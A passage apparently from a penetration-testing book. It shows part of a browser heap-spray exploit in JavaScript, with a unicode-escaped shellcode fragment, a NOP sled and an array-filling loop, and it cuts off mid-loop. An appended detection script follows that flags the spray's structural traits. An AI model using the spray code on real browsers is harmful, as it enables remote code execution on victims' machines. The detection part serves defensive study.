July 2018
Intermediate to advanced
452 pages
11h 51m
English
There are two distinct phases to this attack, so they'll be coded separately. Phase One is the heap spray. In our code, we'll define a function that declares two variables for the NOP sled and the shellcode, grows the NOP sled in a while loop, and then concatenates the two. Finally, a for loop will distribute the naughty bytes into the heap. Let's take a look:
<html>
<head>
<script>
var arr = [];
function sprayer() {
    var shcode = unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0...[snip] ...uc175%ubbc3%ub5f0%u56a2%u006a%uff53%u41d5")
    var nopsled = unescape("%u9090%u9090");
    while(nopsled.length <= 0x100000 - shcode.length) {
        nopsled += nopsled;
    }
    nopsled += shcode;
    for(z = 0; z < 200; z++) {
        arr[z] ...
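Seen from the detection side, the sprayer described above has four structural traits that a static scan of page script can flag. The following is an added example, not code from the book: the function names, the 64 KiB threshold, the three-trait cutoff and both sample scripts are assumptions constructed for illustration, and the sample payload is a placeholder.

```javascript
// Added example: static heuristics for the heap-spray shape described above.
// Names, thresholds and sample scripts are constructed assumptions.

// Fraction of %uXXXX words in an unescape() literal that are 0x9090 (NOP NOP).
function fillerRatio(literal) {
  const words = (literal.match(/%u[0-9a-fA-F]{4}/g) || [])
    .map(w => w.slice(2).toLowerCase());
  if (words.length === 0) return 0;
  return words.filter(w => w === "9090").length / words.length;
}

// Returns the list of spray traits found in a script's source text.
function scanScript(src) {
  const findings = [];
  // 1. An unescape() literal made up only of NOP words (the sled seed).
  const lits = [...src.matchAll(/unescape\(\s*"([^"]*)"\s*\)/g)].map(m => m[1]);
  if (lits.some(l => fillerRatio(l) === 1)) findings.push("nop-filler-literal");
  // 2. A variable appended to itself (x += x), i.e. exponential string growth.
  if (/\b([A-Za-z_$][\w$]*)\s*\+=\s*\1\b(?!\s*[.\[(])/.test(src))
    findings.push("self-doubling-string");
  // 3. A .length comparison against a large constant (>= 64 KiB, assumed cutoff).
  const sizes = [...src.matchAll(/\.length\s*<=?\s*(0x[0-9a-fA-F]+|\d+)/g)]
    .map(m => Number(m[1]));
  if (sizes.some(n => n >= 0x10000)) findings.push("large-size-target");
  // 4. A counted loop (10+ iterations) that assigns into indexed array slots.
  if (/for\s*\([^)]*<\s*\d{2,}[^)]*\)\s*\{[^}]*\[\s*\w+\s*\]\s*=/.test(src))
    findings.push("bulk-array-fill");
  return findings;
}

// Treat three or more co-occurring traits as a likely spray (assumed cutoff).
function isLikelySpray(src) {
  return scanScript(src).length >= 3;
}

// Constructed sample with the same shape as the sprayer; payload is a placeholder.
const SAMPLE_SPRAY = `
var arr = [];
var payload = unescape("%u4141%u4141");
var block = unescape("%u9090%u9090");
while (block.length <= 0x100000 - payload.length) { block += block; }
block += payload;
for (z = 0; z < 200; z++) { arr[z] = block; }
`;

// Constructed benign sample: short unescape() use and a small loop.
const SAMPLE_BENIGN = `
var s = unescape("%u0048%u0069");
for (i = 0; i < 5; i++) { out[i] = s; }
`;
```

Each trait on its own is common in legitimate script, so the verdict relies on several appearing together; obfuscated or dynamically built source needs deobfuscation before a scan like this is useful.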